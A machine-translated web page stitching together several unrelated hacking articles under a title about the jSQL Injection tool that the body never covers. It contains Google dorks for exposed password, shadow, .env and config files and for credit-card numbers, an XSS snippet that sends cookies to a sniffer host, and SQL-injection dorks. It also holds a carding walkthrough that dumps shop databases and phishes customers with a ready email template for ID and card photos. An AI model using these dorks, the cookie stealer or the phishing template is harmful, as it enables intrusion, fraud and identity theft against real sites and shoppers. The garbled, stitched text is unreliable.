Instructions for using jSQL Injection - a multifunctional tool for searching and exploiting SQL injection in Kali Linux. Using Little Known Google Features To Find The Hidden Legal inurl index php pics 2


The Google search engine (www.google.com) provides many search options. All these capabilities are an invaluable search tool for a first-time Internet user and, at the same time, an even more powerful weapon of invasion and destruction in the hands of people with evil intentions, including not only hackers, but also non-computer criminals and even terrorists.
(9475 views in 1 week)

Denis Batrankov
denisNOSPAMixi.ru

Attention:This article is not a guide to action. This article was written for you, administrators of WEB servers, so that you lose the false feeling that you are safe, and you finally understand the insidiousness of this method of obtaining information and set about protecting your site.

Introduction

For example, I found 1670 pages in 0.14 seconds!

2. Let's introduce another line, for example:

inurl: "auth_user_file.txt"

a little less, but this is already enough for free download and for brute-force attacks (using the same John The Ripper). Below I will give some more examples.

So, you need to realize that the Google search engine has visited most of the sites on the Internet and stored in the cache the information they contain. This cached information allows you to get information about the site and the content of the site without a direct connection to the site, just digging into the information that is stored inside Google. Moreover, if the information on the site is no longer available, then the information in the cache may still be preserved. All it takes for this method is to know some Google keywords. This technique is called Google Hacking.

For the first time, information about Google Hacking appeared on the Bugtruck mailing list 3 years ago. In 2001, this topic was brought up by a French student. Here is a link to this letter http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. It provides the first examples of such requests:

1) Index of / admin
2) Index of / password
3) Index of / mail
4) Index of / + banques + filetype: xls (for france ...)
5) Index of / + passwd
6) Index of / password.txt

This topic made a splash in the English-reading part of the Internet quite recently: after Johnny Long's article published on May 7, 2004. For a more complete study of Google Hacking, I recommend visiting this author's site at http://johnny.ihackstuff.com. In this article, I just want to bring you up to date.

Who can use it:
- Journalists, spies and all those people who like to poke their nose into other matters can use this to search for compromising evidence.
- Hackers looking for suitable targets for hacking.

How Google works.

To continue the conversation, let me remind you of some of the keywords used in Google queries.

Search using the + sign

Google excludes from the search, in its opinion, words that are unimportant. For example, question words, prepositions and articles in English: for example are, of, where. In Russian, Google seems to consider all words important. If the word is excluded from the search, then Google writes about it. In order for Google to start looking for pages with these words in front of them, you need to add a + sign without a space in front of the word. For instance:

ace + of base

Search using the sign -

If Google finds a large number of pages from which it is necessary to exclude pages with a specific topic, then you can force Google to search only for pages that do not have specific words. To do this, you need to indicate these words, putting in front of each sign - without a space in front of the word. For instance:

fishing vodka

Search using ~

You may want to find not only the specified word, but also its synonyms. To do this, precede the word with the ~ symbol.

Finding the exact phrase using double quotes

Google searches on each page for all occurrences of the words that you wrote in the query string, and it does not care about the relative position of words, the main thing is that all the specified words are on the page at the same time (this is the default action). To find the exact phrase, you need to enclose it in quotes. For instance:

"bookend"

To have at least one of the specified words, you need to specify the logical operation explicitly: OR. For instance:

book safety OR protection

In addition, in the search bar, you can use the * sign to denote any word and. to denote any character.

Finding words using additional operators

There are search operators that are specified in the search string in the format:

operator: search_term

Spaces next to the colon are not needed. If you insert a space after the colon, you will see an error message, and before it, then Google will use them as a normal search string.
There are groups of additional search operators: languages ​​- indicate in what language you want to see the result, date - limit results for the past three, six or 12 months, occurrences - indicate where in the document you need to search for a string: everywhere, in the title, in the URL, domains - search the specified site or, on the contrary, exclude it from the search, safe search - block sites containing the specified type of information and remove them from the search results pages.
At the same time, some operators do not need an additional parameter, for example, the request " cache: www.google.com"can be called as a full-fledged search string, and some keywords, on the contrary, require a search word, for example" site: www.google.com help". In light of our topic, let's look at the following operators:

Operator

Description

Requires an additional parameter?

search only on the site specified in search_term

search only in documents with the search_term type

find pages containing search_term in title

find pages containing all the words search_term in the title

find pages containing the word search_term in their url

find pages containing all the words search_term in their url

Operator site: restricts the search only to the specified site, and you can specify not only the domain name, but also the IP address. For example, enter:

Operator filetype: restricts searches to files of a specific type. For instance:

As of the article's release date, Google can search within 13 different file formats:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Rich Text Format (rtf)
  • Shockwave Flash (swf)
  • Text (ans, txt)

Operator link: shows all pages that point to the specified page.
It's probably always interesting to see how many places on the Internet know about you. Trying:

Operator cache: shows the version of the site in Google's cache as it looked when Google last visited this page. We take any site that changes frequently and look at:

Operator intitle: searches for the specified word in the page title. Operator allintitle: is an extension - it looks for all specified multiple words in the page title. Compare:

intitle: flight to mars
intitle: flight intitle: to intitle: mars
allintitle: flight to mars

Operator inurl: forces Google to display all pages containing the specified string in the URL. Operator allinurl: Searches for all words in a URL. For instance:

allinurl: acid acid_stat_alerts.php

This command is especially useful for those who do not have SNORT - at least they can see how it works on a real system.

Hacking Methods Using Google

So, we found out that, using a combination of the above operators and keywords, anyone can collect the necessary information and search for vulnerabilities. These techniques are often referred to as Google Hacking.

site `s map

You can use the site: operator to see all the links Google finds on the site. Usually, pages that are dynamically created by scripts are not indexed using parameters, so some sites use ISAPI filters so that links are not in the form /article.asp?num=10&dst=5, and with slashes / article / abc / num / 10 / dst / 5... This is done so that the site is generally indexed by search engines.

Let's try:

site: www.whitehouse.gov whitehouse

Google thinks every page on the site contains the word whitehouse. This is what we use to get all the pages.
There is also a simplified version:

site: whitehouse.gov

And the best part is that the comrades from whitehouse.gov did not even know that we looked at the structure of their site and even looked at the cached pages that Google downloaded for itself. This can be used to study the structure of sites and view content without being noticed for the time being.

Viewing a list of files in directories

WEB servers can display lists of server directories instead of regular HTML pages. This is usually done to get users to select and download specific files. However, in many cases, administrators do not have the goal of showing the contents of a directory. This occurs due to incorrect configuration of the server or the absence of the main page in the directory. As a result, the hacker has a chance to find something interesting in the directory and use it for his own purposes. To find all such pages, just notice that they all contain the words: index of in their title. But since the words index of contain not only such pages, we need to clarify the query and take into account the keywords on the page itself, so queries of the form are suitable for us:

intitle: index.of parent directory
intitle: index.of name size

Since most of the directory listings are intentional, you may find it difficult to find erroneous listings the first time around. But at least you can already use the listings to determine the version of the WEB server, as described below.

Getting the version of the WEB server.

Knowing the version of the WEB server is always useful before starting any hacker attack. Again thanks to Google it is possible to get this information without connecting to the server. If you look closely at the listing of the directory, you can see that the name of the WEB server and its version are displayed there.

Apache1.3.29 - ProXad Server at trf296.free.fr Port 80

An experienced administrator can change this information, but, as a rule, it is true. Thus, to get this information, it is enough to send a request:

intitle: index.of server.at

To get information for a specific server, we clarify the request:

intitle: index.of server.at site: ibm.com

Or vice versa, we are looking for servers running on a specific server version:

intitle: index.of Apache / 2.0.40 Server at

This technique can be used by a hacker to find a victim. If, for example, he has an exploit for a certain version of the WEB server, then he can find it and try the existing exploit.

You can also get the server version by looking at the pages that are installed by default when installing a fresh version of the WEB server. For example, to see the Apache 1.2.6 test page, just type

intitle: Test.Page.for.Apache it.worked!

Moreover, some operating systems immediately install and run the WEB server during installation. At the same time, some users are not even aware of this. Naturally, if you see that someone has not deleted the default page, then it is logical to assume that the computer has not been subjected to any configuration at all and is probably vulnerable to attacks.

Try to find IIS 5.0 pages

allintitle: Welcome to Windows 2000 Internet Services

In the case of IIS, you can determine not only the server version, but also the Windows version and Service Pack.

Another way to determine the version of the WEB server is to search for manuals (help pages) and examples that can be installed on the site by default. Hackers have found many ways to use these components to gain privileged access to a site. That is why you need to remove these components on the production site. Not to mention the fact that by the presence of these components you can get information about the type of server and its version. For example, let's find the apache manual:

inurl: manual apache directives modules

Using Google as a CGI scanner.

CGI scanner or WEB scanner is a utility for searching for vulnerable scripts and programs on the victim's server. These utilities should know what to look for, for this they have a whole list of vulnerable files, for example:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

We can find each of these files using Google, using the words index of or inurl in addition to the file name in the search bar: we can find sites with vulnerable scripts, for example:

allinurl: /random_banner/index.cgi

Using additional knowledge, a hacker can exploit a script vulnerability and use this vulnerability to force the script to return any file stored on the server. For example a password file.

How to protect yourself from Google hacking.

1. Do not post important data to the WEB server.

Even if you posted the data temporarily, then you can forget about it or someone will have time to find and take this data before you erase it. Don't do that. There are many other ways to transfer data to protect it from theft.

2. Check your site.

Use the methods described to research your site. Check your site periodically with new methods that appear on the site http://johnny.ihackstuff.com. Remember that if you want to automate your actions, you need to get special permission from Google. If you read carefully http://www.google.com/terms_of_service.html then you will see the phrase: You may not send automated queries of any sort to Google "s system without express permission in advance from Google.

3. You may not need Google to index your site or part of it.

Google allows you to remove a link to your site or part of it from its database, as well as remove pages from the cache. In addition, you can prohibit the search for images on your site, prohibit showing short fragments of pages in search results. All options for deleting a site are described on the page http://www.google.com/remove.html... To do this, you must confirm that you are actually the owner of this site or insert tags into the page or

4. Use robots.txt

It is known that search engines look into the robots.txt file located at the root of the site and do not index those parts that are marked with the word Disallow... You can take advantage of this to prevent part of the site from being indexed. For example, to avoid indexing the entire site, create a robots.txt file containing two lines:

User-agent: *
Disallow: /

What else happens

So that life does not seem like honey to you, I will say in the end that there are sites that monitor those people who, using the above methods, are looking for holes in scripts and WEB servers. An example of such a page is

Appendix.

A little bit sweet. Try something from the following list yourself:

1. #mysql dump filetype: sql - find dumps of mySQL databases
2. Host Vulnerability Summary Report - will show you what vulnerabilities other people have found
3.phpMyAdmin running on inurl: main.php - this will force close control via phpmyadmin panel
4.not for distribution confidential
5. Request Details Control Tree Server Variables
6. Running in Child mode
7. This report was generated by WebLog
8.intitle: index.of cgiirc.config
9.filetype: conf inurl: firewall -intitle: cvs - can anyone need firewall configuration files? :)
10. intitle: index.of finances.xls - hmm ....
11.intitle: Index of dbconvert.exe chats - icq chat logs
12.intext: Tobias Oetiker traffic analysis
13.intitle: Usage Statistics for Generated by Webalizer
14.intitle: statistics of advanced web statistics
15.intitle: index.of ws_ftp.ini - ws ftp config
16.inurl: ipsec.secrets holds shared secrets - the secret key is a good find
17.inurl: main.php Welcome to phpMyAdmin
18.inurl: server-info Apache Server Information
19.site: edu admin grades
20. ORA-00921: unexpected end of SQL command - getting paths
21. intitle: index.of trillian.ini
22. intitle: Index of pwd.db
23. intitle: index.of people.lst
24. intitle: index.of master.passwd
25. inurl: passlist.txt
26. intitle: Index of .mysql_history
27. intitle: index of intext: globals.inc
28. intitle: index.of administrators.pwd
29. intitle: Index.of etc shadow
30. intitle: index.of secring.pgp
31.inurl: config.php dbuname dbpass
32. inurl: perform filetype: ini

  • "Hacking mit Google"
  • Training Center "Informzashita" http://www.itsecurity.ru - a leading specialized center in the field of information security training (License of the Moscow Education Committee No. 015470, State accreditation No. 004251). The only authorized training center for Internet Security Systems and Clearswift in Russia and the CIS. Microsoft Authorized Training Center (Security specialization). The training programs are coordinated with the State Technical Commission of Russia, the FSB (FAPSI). Certificates of training and state documents on professional development.

    SoftKey is a unique service for buyers, developers, dealers and affiliate partners. In addition, this is one of the best online software stores in Russia, Ukraine, Kazakhstan, which offers customers a wide assortment, many payment methods, prompt (often instant) order processing, tracking the order fulfillment process in the personal section, various discounts from the store and manufacturers ON.

    I decided to talk a little about information security. The article will be useful for novice programmers and those who have just started doing Frontend development. What is the problem?

    Many novice developers are so addicted to writing code that they completely forget about the safety of their work. And most importantly, they forget about vulnerabilities such as SQL query, XXS. They also come up with light passwords for their admin panels and are subjected to brute force. What are these attacks and how can they be avoided?

    SQL injection

    SQL injection is the most common type of database attack that is carried out with an SQL query for a specific DBMS. Many people and even large companies suffer from such attacks. The reason is a developer's mistake when writing a database and, in fact, SQL queries.

    A SQL injection attack is possible due to incorrect processing of input data used in SQL queries. If a hacker successfully completes an attack, you risk losing not only the contents of the databases, but also the passwords and logs of the administrative panel, respectively. And this data will be quite enough to completely take over the site or make irreversible adjustments to it.

    The attack can be successfully reproduced in scripts written in PHP, ASP, Perl, and other languages. The success of such attacks depends more on what DBMS is used and how the script itself is implemented. There are a lot of vulnerable SQL injection sites in the world. This is easy to verify. It is enough to enter "dorks" - these are special requests to search for vulnerable sites. Here are some of them:

    • inurl: index.php? id =
    • inurl: trainers.php? id =
    • inurl: buy.php? category =
    • inurl: article.php? ID =
    • inurl: play_old.php? id =
    • inurl: declaration_more.php? decl_id =
    • inurl: pageid =
    • inurl: games.php? id =
    • inurl: page.php? file =
    • inurl: newsDetail.php? id =
    • inurl: gallery.php? id =
    • inurl: article.php? id =

    How to use them? It is enough to enter them into a Google or Yandex search engine. The search engine will give you not only a vulnerable site, but also a page for this vulnerability. But we will not dwell on this and make sure that the page is really vulnerable. To do this, it is enough to put a single quotation mark "‘ "after the value" id = 1 ". Something like this:

    • inurl: games.php? id = 1 '

    And the site will give us an error about the SQL query. What does our hacker need next?

    And then he needs this very link to the error page. Then the work on the vulnerability in most cases takes place in the "Kali linux" distribution with its utilities for this part: injecting the injection code and performing the necessary operations. How this will happen, I cannot tell you. But you can find information about this on the Internet.

    XSS Attack

    This type of attack is carried out on cookies. Users, in turn, are very fond of saving them. Why not? How can it be without them? Indeed, thanks to Cookies, we do not drive a password from Vk.com or Mail.ru a hundred times. And few of those who refuse them. But on the Internet, a rule often appears for hackers: the convenience factor is directly proportional to the insecurity factor.

    To implement an XSS attack, our hacker needs knowledge of JavaScript. At first glance, the language is very simple and harmless, because it does not have access to computer resources. A hacker can work with JavaScript only in a browser, but that's enough. After all, the main thing is to enter the code into the web page.

    I will not talk in detail about the attack process. I'll just tell you the basics and the meaning of how this happens.

    A hacker can add JS code to a forum or guestbook:

    The scripts will redirect us to the infected page, where the code will be executed: be it a sniffer, some kind of storage or an exploit that will somehow steal our Cookies from the cache.

    Why JavaScript? Because JavaScript gets along well with web requests and has access to cookies. But if our script will transfer us to some site, then the user will easily notice it. Here, the hacker uses a more cunning option - he simply enters the code into the picture.

    Img = new Image ();

    Img.src = ”http://192.168.1.7/sniff.php?32+document.cookie;

    We just create an image and assign our script as an address to it.

    How to protect yourself from all this? Very simple - don't click on suspicious links.

    DoS and DDos Attacks


    DoS (from the English Denial of Service - denial of service) - a hacker attack on a computer system with the aim of bringing it to failure. This is the creation of such conditions under which conscientious users of the system cannot get access to the provided system resources (servers), or this access is difficult. The failure of the system can also be a step towards its capture, if in an emergency situation the software gives out any critical information: for example, the version, part of the program code, etc. But most often it is a measure of economic pressure: the loss of a simple service that generates income. Bills from the provider or measures to avoid an attack significantly hit the target. Currently, DoS and DDoS attacks are the most popular, as they allow almost any system to fail without leaving legally significant evidence.

    What is the difference between DoS and DDos attacks?

    DoS is a cleverly constructed attack. For example, if the server does not check the correctness of incoming packets, then a hacker can make such a request, which will be processed forever, and there will not be enough processor time to work with other connections. Accordingly, customers will receive a denial of service. But it will not work to overload or disable large well-known sites in this way. They are armed with fairly wide channels and super-powerful servers that can cope with such an overload without any problems.

    DDoS is actually the same attack as DoS. But if there is one request packet in DoS, then in DDoS there can be hundreds or more of them. Even super-powerful servers may not be able to handle this overload. Let me give you an example.

    DoS attack is when you are having a conversation with someone, but then some ill-mannered person comes up and starts shouting loudly. At the same time, it is either impossible or very difficult to talk. Solution: call security, which will calm down and lead the person out of the room. DDoS attacks are when such ill-mannered people are rushed in by a crowd of thousands. In this case, the guards will not be able to twist and take everyone away.

    DoS and DDoS are produced from computers called zombies. These are computers of users hacked by hackers, who do not even suspect that their machine is involved in an attack on a server.

    How to protect yourself from this? In general, nothing. But it is possible to complicate the task for a hacker. To do this, you need to choose a good hosting with powerful servers.

    Bruteforce attack

    A developer can come up with a lot of protection systems against attacks, completely view the scripts we have written, check the site for vulnerabilities, etc. But when it comes to the last step of the site layout, namely when it will be easy to put a password on the admin panel, he may forget about one thing. Password!

    It is strongly not recommended to set a simple password. It can be 12345, 1114457, vasya111, etc. It is not recommended to set passwords less than 10-11 characters long. Otherwise, you can undergo the most common and not difficult attack - Brute force.

    Brute-force is a dictionary-based password brute-force attack using special programs. Dictionaries can be different: Latin, enumeration by numbers, say up to a certain range, mixed (Latin + numbers), and there are even dictionaries with unique symbols @ # 4 $% & * ~~ `’ ”\? etc.

    Of course, this type of attack can be easily avoided by creating a complex password. Even captcha can save you. And also, if your site is made on a CMS, then many of them calculate this type of attack and block ip. You must always remember that the more different characters there are in the password, the harder it is to find it.

    How do Hackers work? In most cases, they either suspect or know part of the password beforehand. It is quite logical to assume that the user's password will certainly not consist of 3 or 5 characters. These passwords lead to frequent hacks. Basically, hackers take a range from 5 to 10 characters and add a few characters there, which they probably know in advance. Next, passwords with the required ranges are generated. There are even programs for such cases in the Kali linux distribution. And voila, the attack will no longer last long, since the volume of the dictionary is not so large anymore. In addition, a hacker can use the power of the video card. Some of them support the CUDA system, while the search speed increases by as much as 10 times. And now we see that an attack in such a simple way is quite real. But not only sites are subject to brute force.

    Dear developers, never forget about the information security system, because today many people, including states, suffer from such types of attacks. After all, the greatest vulnerability is a person who can always be distracted somewhere or somewhere not overlooked. We are programmers, but not programmed machines. Be always on the alert, because the loss of information threatens with serious consequences!

    How to search correctly with google.com

    Everyone probably knows how to use a search engine like Google =) But not everyone knows that if you correctly compose a search query using special structures, you can achieve the results that you are looking for much more efficiently and faster =) In this article I will try to show that and how you need to do to search correctly

    Google supports several advanced search operators that have special meaning when searching on google.com. Typically, these operators modify the search, or even tell Google to do completely different types of searches. For example, the construction link: is a special operator, and the request link: www.google.com will not give you a normal search, but will instead find all web pages that have links to google.com.
    alternative request types

    cache: If you include other words in your query, Google will highlight those included words within the cached document.
    For instance, cache: www.web site will show cached content with the word "web" highlighted.

    link: the search query discussed above will show web pages that contain links to the specified query.
    For instance: link: www.site will display all pages that have a link to http: //www.site

    related: Displays web pages that are "related" to the specified web page.
    For instance, related: www.google.com will list web pages that are similar to Google's home page.

    info: Request Information: Provides some of the information Google has about the requested web page.
    For instance, info: website will show information about our forum =) (Armada - Forum of adult webmasters).

    Other information requests

    define: The define: query will provide a definition of the words you enter after this, compiled from various online sources. The definition will be for the entire phrase entered (that is, it will include all words in the exact query).

    stocks: If you start your request with stocks: Google will treat the rest of the request terms as stock ticker symbols, and link to a page showing the ready information for those symbols.
    For instance, stocks: Intel yahoo will show information about Intel and Yahoo. (Note that you must type the breaking news characters, not the company name)

    Request Modifiers

    site: If you include site: in your query, Google will limit the results to the websites it finds on that domain.
    You can also search for individual zones, as such ru, org, com, etc ( site: com site: ru)

    allintitle: If you run a query with allintitle :, Google will limit the results with all the words of the query in the header.
    For instance, allintitle: google search will return all google search pages like images, Blog, etc

    intitle: If you include intitle: in your request, Google will limit the results to documents containing that word in the title.
    For instance, intitle: Business

    allinurl: If you run a query with allinurl: Google will limit the results, with all the words of the query in the URL.
    For instance, allinurl: google search will return documents with google and search in the header. Also, as an option, you can separate words with a slash (/) then words on both sides of the slash will be searched within the same page: Example allinurl: foo / bar

    inurl: If you include inurl: in your query, Google will limit the results to documents containing that word in the URL.
    For instance, Animation inurl: website

    intext: searches only in the text of the page for the specified word, ignoring the title and text of links, and other things not related to. There is also a derivative of this modifier - allintext: those. further, all words in the query will be searched only in the text, which is also important, ignoring frequently used words in links
    For instance, intext: forum

    daterange: searches in time frames (daterange: 2452389-2452389), dates for times are in Julian format.

    Well, and all sorts of interesting examples of requests

    Examples of writing queries for Google. For spammers

    Inurl: control.guest? A = sign

    Site: books.dreambook.com “Homepage URL” “Sign my” inurl: sign

    Site: www.freegb.net Homepage

    Inurl: sign.asp “Character Count”

    "Message:" inurl: sign.cfm "Sender:"

    Inurl: register.php “User Registration” “Website”

    Inurl: edu / guestbook “Sign the Guestbook”

    Inurl: post “Post Comment” “URL”

    Inurl: / archives / “Comments:” “Remember info?”

    “Script and Guestbook Created by:” “URL:” “Comments:”

    Inurl:? Action = add “phpBook” “URL”

    Intitle: ”Submit New Story”

    Magazines

    Inurl: www.livejournal.com/users/ mode = reply

    Inurl greatestjournal.com/ mode = reply

    Inurl: fastbb.ru/re.pl?

    Inurl: fastbb.ru /re.pl? "Guest book"

    Blogs

    Inurl: blogger.com/comment.g? ”PostID” “anonymous”

    Inurl: typepad.com/ “Post a comment” “Remember personal info?”

    Inurl: greatestjournal.com/community/ “Post comment” “addresses of anonymous posters”

    “Post comment” “addresses of anonymous posters” -

    Intitle: "Post comment"

    Inurl: pirillo.com “Post comment”

    Forums

    Inurl: gate.html? ”Name = Forums” “mode = reply”

    Inurl: "forum / posting.php? Mode = reply"

    Inurl: "mes.php?"

    Inurl: "members.html"

    Inurl: forum / memberlist.php? ”

    [Prologue]

    I think each of us tried to get credit cards on our own, I'm no exception .. The main method is to drain the online store database through SQL-inj.

    [Parsing]

    It all starts with parsing links. Personally, I used my own parser. You can use open source software .. Note that you shouldn't just use a bare query like

    Inurl: product.php? Id =

    need something like this

    Inurl: "product.php? Id =" buy iphone

    or even so

    Inurl: "* shop.com" inurl: ". Php? Id =" dress

    The quotation marks play a big role here ... Here are some excrement docks:

    Inurl: buy.php? Category = inurl: gallery.php? Id = d = inurl: event.php? Id = inurl: view_product.php? Id = inurl: product.php? Id = inurl: products.php? Id = inurl: shop.php? id = inurl: collectionitem.php? id = inurl: shopping.php? id = inurl: items.php? id =

    And now we have a couple of thousand links!

    [Check for sql-inj. Drain DB]

    That's it, we have parsed our million links. Let's start a check .. And here I used my checker .. You can use publicly available software ...

    Here it is...

    We have collected vulnerable links, we are starting to drain. Personally, I use Havij first. If he cannot, and this is in 50% of cases, then hands are used. And here it is !!! We came across a table with the name

    We open it, and ..... and there are no columns with credit cards. Eh ...

    [SS is where it is not]

    Yes, we did not find a column with ss, which is sad. 99% of carders will score on such a shop and move on. Take your time. We have on hand all the orders of the shop, names, surnames, addresses and dates of customers. Now let's remember what usually happens when we pinch on ss? That's right, we are asked for a photo of documents and a credit card ...

    [Now WE ARE A SHOP!]

    Merging from the table

    FName LName order date email

    Of course, the names may be different.

    Now we have everything we need. We register an email of the form hotmail.com. We are now ready. We start spamming ..

    Sample text of the letter:

    Dear FName LName, We are processing your order. As part of our security procedures, we ask that you provide the following documents: 1) Your valid photo identification (e.g. passport or driving license). 2) An utility bill or bank statement issued on your name, that shows your current address. Please note that such can only be accepted if it’s dated no longer than 3 months back from the current date. 3) Copy of your credit card (front and back side). Once your ID and utility bill are verified, they will be placed in a secure file and you will not be asked to re-send it in the future. Send your documents at e-mail to Please note, if after 2 days, we do not receive legible e-mail, we will cancel your order.


    # The tests were carried out over India. The response was approximately 40%.
    # All documents obtained in this way were erased, and the shops were notified of the vulnerability.
    # The article was written for informational purposes only. In no way am I encouraging you to take action.

    Getting private data doesn't always mean hacking - sometimes it's publicly available. Knowing the Google settings and a little bit of ingenuity will allow you to find a lot of interesting things - from credit card numbers to FBI documents.

    WARNING

    All information is provided for informational purposes only. Neither the editorial board nor the author is responsible for any possible harm caused by the materials of this article.

    Today, everything is connected to the Internet, caring little about restricting access. Therefore, a lot of private data becomes the prey of search engines. Spider robots are no longer limited to web pages, but index all the content available on the Web and constantly add non-public information to their databases. Finding out these secrets is easy - you just need to know exactly how to ask about them.

    Looking for files

    In the right hands, Google will quickly find everything that is bad on the Web - for example, personal information and files for official use. They are often hidden, like a key under a rug: there are no real access restrictions, the data just lies on the backyard of the site, where links do not lead. Google's standard web interface only provides basic advanced search settings, but even those will suffice.

    You can use two operators to limit your search to specific file types on Google using filetype and ext. The first specifies the format that the search engine determined by the file title, the second - the file extension, regardless of its internal content. When searching in both cases, you only need to specify the extension. Initially, the ext operator was convenient to use in cases where the file did not have specific format features (for example, to search for ini and cfg configuration files, inside which anything could be). Now Google's algorithms have changed, and there is no visible difference between operators - the results in most cases come out the same.


    Filtering the issue

    By default, Google searches for words and, in general, any entered characters in all files on indexed pages. You can limit the search scope by top-level domain, a specific site, or by the location of the desired sequence in the files themselves. For the first two options, the operator site is used, followed by the name of the domain or the selected site. In the third case, a whole set of operators allows you to search for information in service fields and metadata. For example, allinurl will find the specified in the body of the links themselves, allinanchor - in the text with the tag , allintitle - in the page titles, allintext - in the body of the pages.

    For each operator there is a lite version with a shorter name (without the all prefix). The difference is that allinurl will find links with all words, while inurl will only find links with the first one. The second and subsequent words from the query can appear anywhere on web pages. The inurl operator also differs from another, similar in meaning - site. The former also allows you to find any sequence of characters in a link to the searched document (for example, / cgi-bin /), which is widely used to find components with known vulnerabilities.

    Let's try it in practice. We take the allintext filter and make the request return a list of credit card numbers and verification codes, which will expire only after two years (or when their owners get tired of feeding everyone in a row).

    Allintext: card number expiration date / 2017 cvv

    When you read in the news that a young hacker "hacked the servers" of the Pentagon or NASA, stealing classified information, then in most cases we are talking about just such an elementary technique of using Google. Suppose we are interested in a list of NASA employees and their contact details. Surely there is such a list in electronic form. For convenience or through oversight, it can also be found on the organization's website itself. It is logical that in this case there will be no links to it, since it is intended for internal use. What words can be in such a file? At least - the "address" field. Testing all these assumptions is easy.


    Inurl: nasa.gov filetype: xlsx "address"


    We use bureaucracy

    Finds like these are a nice little thing. A really solid catch provides a more detailed knowledge of Google operators for webmasters, the Web itself, and the structure of what is being sought. Knowing the details, you can easily filter the results and refine the properties of the files you need in order to get really valuable data in the remainder. It's funny that bureaucracy comes to the rescue here. It produces standard formulations that make it convenient to search for secret information accidentally leaked into the Web.

    For example, the Distribution statement stamp, which is mandatory in the office of the US Department of Defense, means standardized restrictions on the distribution of a document. Letter A denotes public releases in which there is nothing secret; B - for internal use only, C - strictly confidential, and so on up to F. Separately, there is the letter X, which marks especially valuable information representing a state secret of the highest level. Let such documents be looked for by those who are supposed to do it on duty, and we will restrict ourselves to files with the letter C. According to the DoDI directive 5230.24, such marking is assigned to documents containing a description of critical technologies that come under export control. Such highly guarded information can be found on sites in the .mil top-level domain dedicated to the US Army.

    "DISTRIBUTION STATEMENT C" inurl: navy.mil

    It is very convenient that the .mil domain contains only sites from the US Department of Defense and its contract organizations. Domain-restricted search results are exceptionally clean, and the headlines are self-explanatory. It is practically useless to search for Russian secrets in this way: chaos reigns in the .ru and.rf domains, and the names of many weapons systems sound botanical (PP "Cypress", ACS "Akatsiya") or completely fabulous (TOS "Buratino").


    By carefully examining any document from a site in the .mil domain, you can see other markers to refine your search. For example, a reference to export restrictions "Sec 2751", which is also convenient to search for interesting technical information. From time to time, it is withdrawn from the official sites, where it once appeared, so if you cannot follow an interesting link in the search results, use Google's cache (cache operator) or the Internet Archive site.

    Climbing into the clouds

    In addition to accidentally declassified government documents, Google's cache occasionally pops up links to personal files from Dropbox and other storage services that create "private" links to publicly released data. It's even worse with alternative and homemade services. For example, the following request finds data from all Verizon clients who have an FTP server installed and actively used on their router.

    Allinurl: ftp: // verizon.net

    There are now more than forty thousand such clever people, and in the spring of 2015 there were an order of magnitude more. Instead of Verizon.net, you can substitute the name of any well-known provider, and the more famous it is, the bigger the catch can be. Through the built-in FTP server, you can see the files on the external storage connected to the router. Usually this is a NAS for remote work, a personal cloud or some kind of peer-to-peer file download. All contents of such media are indexed by Google and other search engines, so you can access files stored on external drives using a direct link.

    Peeping configs

    Before the widespread migration to the clouds, simple FTP servers, which also had enough vulnerabilities, ruled as remote storages. Many of them are still relevant today. For example, the popular WS_FTP Professional program stores configuration data, user accounts, and passwords in the ws_ftp.ini file. It is easy to find and read as all records are stored in plain text and passwords are encrypted with Triple DES after minimal obfuscation. In most versions, simply discarding the first byte is sufficient.

    It is easy to decrypt such passwords using the WS_FTP Password Decryptor utility or a free web service.

    When talking about hacking an arbitrary site, they usually mean getting a password from logs and backups of CMS configuration files or e-commerce applications. If you know their typical structure, you can easily specify keywords. Lines like those found in ws_ftp.ini are extremely common. For example, Drupal and PrestaShop have a user ID (UID) and a corresponding password (pwd), and all information is stored in files with the .inc extension. You can search for them as follows:

    "pwd =" "UID =" ext: inc

    Revealing passwords from DBMS

    In the configuration files of SQL servers, usernames and email addresses are stored in clear text, and their MD5 hashes are written instead of passwords. It is, strictly speaking, impossible to decrypt them, but you can find a match among the known hash-password pairs.

    Until now, there are DBMSs that do not even use password hashing. The configuration files for any of them can simply be viewed in the browser.

    Intext: DB_PASSWORD filetype: env

    With the advent of Windows servers, configuration files were partially replaced by the registry. You can search through its branches in exactly the same way, using reg as the file type. For example, like this:

    Filetype: reg HKEY_CURRENT_USER "Password" =

    Don't forget the obvious

    Sometimes it is possible to get to classified information with the help of data that was accidentally opened and caught in the field of Google's field of view. Ideally, find a list of passwords in some common format. Only desperate people can store account information in a text file, Word document or Excel spreadsheet, but there are always enough of them.

    Filetype: xls inurl: password

    On the one hand, there are many ways to prevent such incidents. It is necessary to specify adequate access rights in htaccess, patch CMS, do not use left-hand scripts and close other holes. There is also a robots.txt file that prevents search engines from indexing files and directories specified in it. On the other hand, if the robots.txt structure on some server differs from the standard one, then you can immediately see what they are trying to hide on it.

    The list of directories and files on any site is preceded by the standard index of. Since for service purposes it must appear in the header, it makes sense to limit its search to the intitle operator. Interesting things are found in the / admin /, / personal /, / etc / and even / secret / directories.

    Follow the updates

    The relevance here is extremely important: old vulnerabilities are closed very slowly, but Google and its search results are constantly changing. There is even a difference between the “last second” filter (& tbs = qdr: s at the end of the request url) and “real time” (& tbs = qdr: 1).

    The time interval of the date of the last update of the file from Google is also implicitly indicated. Through the graphical web interface, you can select one of the typical periods (hour, day, week, and so on) or set a date range, but this method is not suitable for automation.

    From the look of the address bar, you can only guess about the way to limit the output of results using the construction & tbs = qdr:. The letter y after it sets the limit of one year (& tbs = qdr: y), m shows the results for the last month, w for the week, d for the last day, h for the last hour, n for the minute, and s for give me a sec. The most recent results just reported to Google are found using the & tbs = qdr: 1 filter.

    If you need to write a tricky script, it will be useful to know that the date range is set in Google in Julian format using the daterange operator. For example, this is how you can find a list of PDFs with the word confidential uploaded between January 1st and July 1st, 2015.

